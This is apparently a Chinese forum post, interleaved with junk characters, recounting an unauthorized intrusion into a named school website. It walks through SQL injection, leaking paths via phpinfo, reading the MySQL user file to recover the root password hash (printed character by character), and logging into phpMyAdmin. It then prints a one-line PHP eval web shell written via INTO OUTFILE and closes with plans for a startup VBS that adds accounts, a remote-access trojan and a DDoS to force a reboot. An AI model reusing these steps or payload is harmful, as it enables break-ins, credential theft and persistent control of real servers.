第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏- G$ o& e6 {& D6 ]: i( A/ C. X4 @
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
/ v! H# B8 Q+ R J z J2 m
( y% M V# g' l; x8 P1 j, N/ ^) y/ s2 r; n% {
7 E) ]6 J/ H. Q5 I9 r/ d: z7 s常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
! m0 c( \( w; r. d: }* L$ @, K1 P* w* G! K1 R) ]" S9 `% I
那么想可以直接写入shell ,getshell有几个条件:4 D6 [- ~2 s+ H" p. K4 C! c
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
2 b0 q, @1 v! D5 |! J! o5 ^7 {6 g0 h& \5 V3 @8 B& O
试着爆绝对路径:
! h/ R! q& b3 F+ x/ G1./phpMyAdmin/index.php?lang[]=1 , P& g% i; E: Y" n& W. D% |$ y2 t
2./phpMyAdmin/phpinfo.php
* c; i, Z1 o- u( `2 h3 z$ _& H3./load_file() - S Y" N2 ?$ [( p9 i
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
2 R1 {% d; G9 z8 ]% Y; g5./phpmyadmin/libraries/select_lang.lib.php * N/ j; u1 e1 q* G; V
6./phpmyadmin/libraries/lect_lang.lib.php
5 ^; J& H, I# ]7 u% @1 b7./phpmyadmin/libraries/mcrypt.lib.php ' x3 Q3 q3 b3 J0 H
8./phpmyadmin/libraries/export/xls.php ( A/ o7 d: I0 \/ x& n
' f6 W0 |, X$ W( K) K" u3 y均不行........................... 5 P' N8 x* b4 f" v$ G
# i; I: O, ~0 E% Q! R
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
6 a! G9 j5 Y6 u5 `( p
: y( X$ B6 t3 P; \! _9 ` ^权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
; e2 l. `- E$ r, l+ H( \3 P2 c. F% C( b
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
! R, {! T6 T* S
7 J' u! K- \6 q$ ^: k敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
$ ]* ], P0 q0 i3 W% n O r% k8 E) ]" p* P+ \- B7 ^
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
8 i" [5 G/ R9 F, P: _' J8 q5 z6 k1 h$ P1 T4 N
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
( }. Y# v8 @ ?0 D' K# Y- ~, I" v0 N1 E0 U- e
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD + m m/ z5 ~9 p; l6 W2 `
# c+ i0 K0 V9 f6 C成功读到root密码: 4 H6 A. a' {& q, k$ }
9 O- M. V. G" w5 S2 ?17---- r(0072)
1 y8 U; U6 F0 b2 C+ [" U' T9 D18---- o(006f)
& q( H, ^5 |; A6 ~" d- d3 _1 ]19---- o(006f) 4 A5 ~* `4 V: t r1 G: E2 f
20---- t(0074) ; ?2 j/ q( B6 F2 n) t
21---- *(002a) " p4 A. n/ L# Y8 |$ u
22---- 8(0038) 9 q: r/ F! i5 \2 D0 T
23---- 2(0032) & C% X6 w; T# y* _
24---- E(0045) : \9 M/ \" H% r. a# L
25---- 1(0031) % c% M7 y* h* S' C
26---- C(0043)
! v- H! x2 g$ A& ]4 r2 B4 ^; c27---- 5(0035)
* i; { O9 z" `28---- 8(0038) " d4 l& l* V" X+ t) C5 y) C
29---- 2(0032)
- z* x& V C8 E0 w30---- 8(0038) % [ ^/ l1 ~2 m* u
31---- A(0041)
% }! z. a9 n4 T& B2 u1 n32---- 9(0039)
/ m7 m0 h% T8 d; x# n1 X! Y1 j- S33---- B(0042)
1 |; J& W8 \( x8 e; p/ u34---- 5(0035) * {3 b! s4 z8 h: h: C2 Z6 a" [
35---- 4(0034) - f s/ K, x u( j% r& d7 ?
36---- 8(0038) 4 \7 m8 S2 l0 a4 {2 {# L+ ^( X
37---- 6(0036)
+ @( V8 c; Q! r K- _38---- 4(0034) 8 S6 H' S, p& j7 r2 G
39---- 9(0039)
0 b: R: e5 A# D4 r) M40---- 1(0031)
' ?) j* R2 a8 J- J( O41---- 1(0031) 7 h3 G# b$ j. a" Q. V' M+ [% J- j
42---- 5(0035) ( s/ d) D1 o, T5 g; l' C
43---- 3(0033) ; }% G) k. C# F" i% [5 g+ w
44---- 5(0035)
$ g# C4 b' e0 t$ m4 Y45---- 9(0039)
7 x# C5 G3 a% d6 j( L5 o6 c- h46---- 8(0038) - }: W8 {% I; e
47---- F(0046)
, h ?/ ^) J) X: h4 O9 f% M1 N48---- F(0046) 7 X9 D. L; r9 ]. r* b
49---- 4(0034)
) R* v# J Z8 N$ E4 A$ {2 T50---- F(0046) + R& B7 W6 L! k
51---- 0(0030) : W+ r) |5 a1 h, k: x' i% h
52---- 3(0033) " Q) ]# i( o4 ^+ Y0 [ f7 G: W7 o
53---- 2(0032)
) Z. O; i* b/ P3 c& J6 f54---- A(0041)
' {3 e+ [5 T4 K l& O9 I55---- 4(0034) " x Y% _( S: ]* U7 k; Q% U _
56---- A(0041) + F; V: Q) E" A9 _
57---- B(0042)
; E- T% ~! G% A/ L# P58---- *(0044)
6 d6 Q8 x! I M) V" ?7 N1 G59---- *(0035)
" \9 Z3 h* d0 E# X- v- x60---- *(0041) 0 J( T9 g: \+ {3 |( n4 T: |9 q
61---- *0032)
; {* U( e) [. ~
s* M9 X* e" ?1 h& r2 H, U解密后成功登陆phpmyamin
( z7 e- n* `2 Q5 {7 L$ E9 e! K0 h $ D" L5 S% M* X8 a% D- h1 j5 v! ?
% ^1 F( S! n' W1 ^9 m5 X1 E 8 d3 N+ B: T+ \9 |0 O) c/ ?
$ g: J/ F$ \( Z+ ^2 ], {, {
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
$ [3 M+ E4 Z% Z5 u) Z% {4 c$ P! }" c' J, |& O- Y" w) Z
成功执行,拿下shell,菜刀连接:
' D2 C. [+ Q& W- `8 I. T" z2 Y. R$ u
服务器不支持asp,aspx,php提权无果................... , n8 b/ X, z) T" P3 N7 l
9 p' A5 Z0 _1 H: V K6 x
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
0 `" L/ O; _! p: l( m6 R( s7 ~! Q服务器上已经有个隐藏帐号了
* _( y$ A T! O$ ~; \5 E别名 administrators
" e7 ^4 T+ y8 M注释 管理员对计算机/域有不受限制的完全访问权 9 ~8 @% V( C! R* S
成员
. ^: A l( s) U4 Q6 R; C v------------------------------------------------------------------------------- w; @4 e4 q9 V" i
admin- a7 @/ \; }) p6 u$ V
Administrator- j# e1 \" [+ j/ I' p: W- z
slipper$
1 \& Y- ~' b) J6 U8 v6 J8 l$ {: Psqluser; ]0 O# b: U2 v9 X. Q1 |: Z
命令成功完成。 - \( |# N+ r2 [2 f0 [- ?; ^0 N
% {4 ?9 U6 e% \5 U* e/ X7 [服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。: g5 `1 O0 H$ U
9 a1 H0 @4 J n5 uddos服务器重启,不然就只能坐等服务器重启了............................... z% S6 T# n& O8 @: a0 D$ T/ z
# x/ N" L/ ~7 k" v& e2 }" _
/ @" C6 I7 C6 ~) ?# Z |